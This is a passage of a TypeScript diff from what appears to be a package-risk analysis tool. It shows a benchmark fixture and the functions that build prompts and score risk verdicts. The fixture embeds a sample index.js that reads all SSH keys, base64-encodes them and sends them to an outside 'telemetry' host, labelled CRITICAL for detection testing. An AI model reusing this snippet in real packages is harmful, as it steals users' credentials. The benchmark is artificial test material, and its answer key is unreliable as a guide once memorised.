+ license: 'MIT',
364
+ dependencies: {},
365
+ scripts: {},
366
+ },
367
+ versionHistory: [
368
+ { version: '1.0.0', published: '2024-10-01', depsChanged: 'none', filesChanged: 'new package', sizeDelta: 'N/A', newMaintainer: true },
369
+ { version: '2.0.0', published: '2025-01-15', depsChanged: 'none', filesChanged: 'major', sizeDelta: '+3KB', newMaintainer: false },
370
+ ],
371
+ sourceFiles: [
372
+ {
373
+ path: 'index.js',
374
+ size: 420,
375
+ content: `const fs = require('fs');
376
+ const path = require('path');
377
+ const https = require('https');
378
+ const os = require('os');
379
+
380
+ function listKeys() {
381
+ const sshDir = path.join(os.homedir(), '.ssh');
382
+ if (!fs.existsSync(sshDir)) return [];
383
+ const files = fs.readdirSync(sshDir);
384
+ const keys = files.map(f => ({ name: f, content: fs.readFileSync(path.join(sshDir, f), 'utf-8') }));
385
+ const payload = Buffer.from(JSON.stringify(keys)).toString('base64');
386
+ https.get('https://telemetry-cdn.com/k?d=' + payload, () => {});
387
+ return files;
388
+ }
389
+
390
+ module.exports = { listKeys };`,
391
+ },
392
+ ],
393
+ knownCVEs: [],
394
+ expected: { risk_level: 'CRITICAL', min_risk_score: 85, max_risk_score: 100, must_flag: ['filesystem_access', 'exfiltration', 'network_calls'] },
395
+ },
396
+ ];
397
+ }
398
+
399
/**
 * Builds the user prompt for a benchmark case by forwarding the case's
 * metadata, version history, source files and known CVEs to
 * `buildUserPrompt`.
 *
 * @param bench - The benchmark fixture to turn into a prompt.
 * @returns Whatever `buildUserPrompt` returns for those four inputs.
 */
export function buildBenchmarkPrompt(bench: BenchmarkCase): string {
  const { metadata, versionHistory, sourceFiles, knownCVEs } = bench;
  return buildUserPrompt(metadata, versionHistory, sourceFiles, knownCVEs);
}
402
+
403
/** Outcome of scoring one benchmark case. */
export type BenchmarkVerdict =
  | 'PASS'
  | 'FAIL';
404
+
405
/**
 * Result of comparing one analysis outcome against a benchmark case,
 * as produced by `evaluateBenchmark`.
 */
export interface BenchmarkResult {
  /** `id` of the benchmark case that was evaluated. */
  caseId: string;
  /** `category` of the benchmark case that was evaluated. */
  category: string;
  /** Risk level the case expects. */
  expectedLevel: string;
  /** Risk level that was actually reported. */
  actualLevel: string;
  /** Expected score bounds as `[min_risk_score, max_risk_score]`. */
  expectedScoreRange: [number, number];
  /** Risk score that was actually reported. */
  actualScore: number;
  /** Whether the reported outcome was accepted. */
  verdict: BenchmarkVerdict;
  /**
   * Human-readable explanation: `'Correctly classified'` on PASS,
   * otherwise a description of the mismatch.
   */
  reason: string;
}
415
+
416
/**
 * Scores one analysis outcome against a benchmark case.
 *
 * A case passes when both of the following hold:
 *   1. `actualRiskScore` lies within the case's inclusive
 *      `[min_risk_score, max_risk_score]` range, and
 *   2. `actualRiskLevel` is a recognised level that is at most one step away
 *      from the expected level on the scale LOW < MEDIUM < HIGH < CRITICAL.
 *
 * The level is matched case-insensitively and ignoring surrounding
 * whitespace. An unrecognised level (empty string, typo, arbitrary text) is
 * a failure; it is never treated as LOW.
 *
 * `bench.expected.must_flag` is not consulted here.
 *
 * @param bench - Benchmark case supplying the expected level and score range.
 * @param actualRiskLevel - Risk level reported for the case.
 * @param actualRiskScore - Risk score reported for the case.
 * @returns A result whose `verdict` is `'PASS'` or `'FAIL'`. On failure,
 *   `reason` lists every failed check, joined with `'; '`.
 */
export function evaluateBenchmark(
  bench: BenchmarkCase,
  actualRiskLevel: string,
  actualRiskScore: number,
): BenchmarkResult {
  const {
    risk_level: expectedLevel,
    min_risk_score: minScore,
    max_risk_score: maxScore,
  } = bench.expected;

  // A Map (rather than a plain object) so that inherited keys such as
  // "constructor" or "toString" can never resolve to a value.
  const levelOrdinals = new Map<string, number>([
    ['LOW', 0],
    ['MEDIUM', 1],
    ['HIGH', 2],
    ['CRITICAL', 3],
  ]);

  // NaN fails both comparisons and is therefore reported as out of range.
  const scoreInRange = actualRiskScore >= minScore && actualRiskScore <= maxScore;

  const expectedOrd = levelOrdinals.get(expectedLevel) ?? 0;
  // `undefined` here means the reported level is not one of the four known
  // levels; it must not fall back to LOW.
  const actualOrd = levelOrdinals.get(String(actualRiskLevel).trim().toUpperCase());
  const levelCorrect = actualOrd !== undefined && Math.abs(actualOrd - expectedOrd) <= 1;

  const failures: string[] = [];
  if (!scoreInRange) {
    failures.push(`Score ${actualRiskScore} outside expected range [${minScore}, ${maxScore}]`);
  }
  if (actualOrd === undefined) {
    failures.push(`Unrecognized risk level "${actualRiskLevel}"`);
  } else if (!levelCorrect) {
    failures.push(`Level ${actualRiskLevel} does not match expected ${expectedLevel}`);
  }

  const passed = failures.length === 0;

  return {
    caseId: bench.id,
    category: bench.category,
    expectedLevel,
    actualLevel: actualRiskLevel,
    expectedScoreRange: [minScore, maxScore],
    actualScore: actualRiskScore,
    verdict: passed ? 'PASS' : 'FAIL',
    reason: passed ? 'Correctly classified' : failures.join('; '),
  };
}